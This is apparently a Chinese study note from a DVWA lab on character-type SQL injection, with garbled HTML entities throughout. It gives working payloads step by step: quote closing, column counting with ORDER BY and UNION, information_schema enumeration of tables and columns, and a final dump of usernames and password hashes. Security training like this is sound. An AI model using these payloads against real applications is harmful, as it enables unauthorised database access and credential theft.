DVWA学习Sql注入笔记（字符型sql注入）

一.判断是否存在注入&＃xff0c;注入是字符型还是数字型
当我们在1之后加了一个引号&＃xff0c;则会导致单引号数目不平衡&＃xff0c;如何让引号闭合&＃xff1f;

&＃xff08;方法1&＃xff09;我们在原来的基础上再继续输入多一个引号&＃xff0c;也就是“1””。
这时候我们看一下查询语句

select firstname,surname from users where id &＃61; &＃39;1&＃39;&＃39;&＃39;;

这时候得讲一个mysql的语法&＃xff0c;
在where语句中&＃xff0c;当出现多个字符串的时候&＃xff0c;“&＃61;”将会选择优先级最高的一个&＃xff0c;优先级是从左到右&＃xff0c;依次降低的&＃xff01;也就是离“&＃61;”最近的一个。
我们来看几个例子。
第一个是和我们上面类似的sql查询语句
select * from users where user_id &＃61; ‘1”’;
第二个是来阐明我们这个优先级的&＃xff0c;
select * from users where user_id &＃61; ‘1”2’;
可以看到&＃xff0c;出来的结果还是和user_id&＃61;1一样。
我们再看一个长长的&＃xff0c;
select * from users where user_id &＃61; ‘1”2”abc”efg’;
事实胜于雄辩&＃xff0c;可以看到结果还是和上面的一样。

&＃xff08;方法2&＃xff09;第二种方法是使用“#”符号来注释后面的单引号
到时查询语句将会变成这样

select firstname,surname from users where id &＃61; &＃39;1&＃39;#&＃39;;

&＃xff08;方法3&＃xff09;第三种方法是使用“– ”&＃xff0c;这里注意了“–”后面有一个空格。在url当中&＃xff0c;我们需要使用“&＃43;”来代替“–”后面的空格。
到时查询语句将会变成这样

select firstname,surname from users where id &＃61; &＃39;1&＃39;-- &＃39;;

我们回到我们的测试页面。发现出来的结果和输入1一样。
到这里我们可以知道了
[1]漏洞的参数是“id”
[2]漏洞的类型是字符型


二.猜解SQL查询语句中的字段数
三.确定显示的字段顺序
&＃xff08;方法1&＃xff09;分析字段数的原因是我们之后需要用union select语句获得我们需要的敏感数据。
构造的payload如下&＃xff1a;

1&＃39; order by 1#
1&＃39; order by 2#
1&＃39; order by 3#

当输入到3的时候&＃xff0c;发现它报错了。也就是字段数为2。

&＃xff08;方法2&＃xff09;第二种方法就是直接用union select来猜测字段数&＃xff0c;因为当字段数不对应的时候&＃xff0c;它也是会发生报错的&＃xff01;

1&＃39; union select 1#
1&＃39; union select 1,2#
1&＃39; union select 1,2,3#

可以发现&＃xff0c;当union select 1,2的时候没有报错&＃xff0c;也就是字段数为2。同时&＃xff0c;我们也应该注意到&＃xff0c;好像返回的内容多了三条数据&＃xff0c;这是啥呢&＃xff1f;

这就是我们我们union select出来的数据了。我们获取数据的信息&＃xff0c;就通过将1,2换成数据的信息&＃xff0c;这样通过查看页面&＃xff0c;我们便可以获得了&＃xff01;

四.获取当前数据库
字段数为2&＃xff0c;也就是select出来的数据列有两列。也就是我们可以通过union select出两个数据。好了我们来获得关于我们数据库的信息吧&＃xff01;

获取当前数据库名字&＃xff0c;当前用户名

1&＃39; union select database(),user()#

这里解释一下&＃xff0c;database()将会返回当前网站所使用的数据库名字&＃xff0c;user()将会返回进行当前查询的用户名。

好的&＃xff0c;这里我们看到
当前数据库为:dvwa
当前用户名:root&＃64;localhost

类似的函数&＃xff1a;version() 获取当前数据库版本

Tips:有时候&＃xff0c;后面的select语句会限制输出的行数&＃xff0c;通过limit 1&＃xff0c;所以我们一般来说&＃xff0c;都会让原数据库查询无效&＃xff0c;也就是输入无效的id。
如下&＃xff1a;

-1&＃39; union select database(),user()#

这样就只会返回我们的数据了。

五.获取数据库中的表

mysql有没有类似新华的字典的东东呢&＃xff1f;
它的这本新华字典叫做information_schema&＃xff0c;是一个包含了mysql数据库所有信息的新华字典&＃xff0c;有啥关于数据库的信息不知道问它没问题&＃xff01;它本质上还是一个database&＃xff0c;存着其他各个数据的信息。
在其中&＃xff0c;有一个表长成这样tables。有一个表长这样columns。
是不是有点感觉了&＃xff1f;
是的&＃xff0c;tables这个表存的是关于数据库中所有表的信息&＃xff0c;他有个字段叫table_name&＃xff0c;还有个字段叫做table_schema。其中table_name是表名&＃xff0c;table_schema表示的表所在的数据库。
对于columns&＃xff0c;它有column_name,table_schema,table_name

回想一下&＃xff0c;我们拥有的消息是数据库名。也就是说我们可以构造这样的payload

-1&＃39; union select table_name,2
from information_schema.tables
where table_schema&＃61; &＃39;dvwa&＃39;#

你是不是想问&＃xff0c;information_schema.tables是啥呢&＃xff1f;
information_schema不就使我们的新华字典咯&＃xff01;这里我们使用一种语法&＃xff0c;
“数据名.表名”
tables就相当于我们新华字典的目录&＃xff0c;table_name是tables里面的字段。语句的意思就是&＃xff0c;这里是一本新华字典帮我把数据库名为”dvwa”这个偏旁部首的字(表名)找出来。

六.获取表中的字段名
那之后呢&＃xff1f;不是说还有一个columns表么&＃xff1f;
那我们需要什么&＃xff1f;需要table_name以及table_schema
那我们查什么呢&＃xff1f;column_name
这次我们的构造的payload如下

-1&＃39; union select column_name,2
from information_schema.columns
where table_schema&＃61; &＃39;dvwa&＃39; and table_name&＃61; &＃39;users&＃39;#

这里说一下&＃xff0c;倘若不指定数据库名为’dvwa’&＃xff0c;若是其他数据里面也存在users表的话&＃xff0c;则会有很多混淆的数据。

又来了&＃xff0c;好多数据呀&＃xff01;
验证user,password吧&＃xff01;两个字段刚刚好&＃xff01;
好的&＃xff0c;我们再次修改payload

-1&＃39; union select user,password from users#

就可以得到密码了。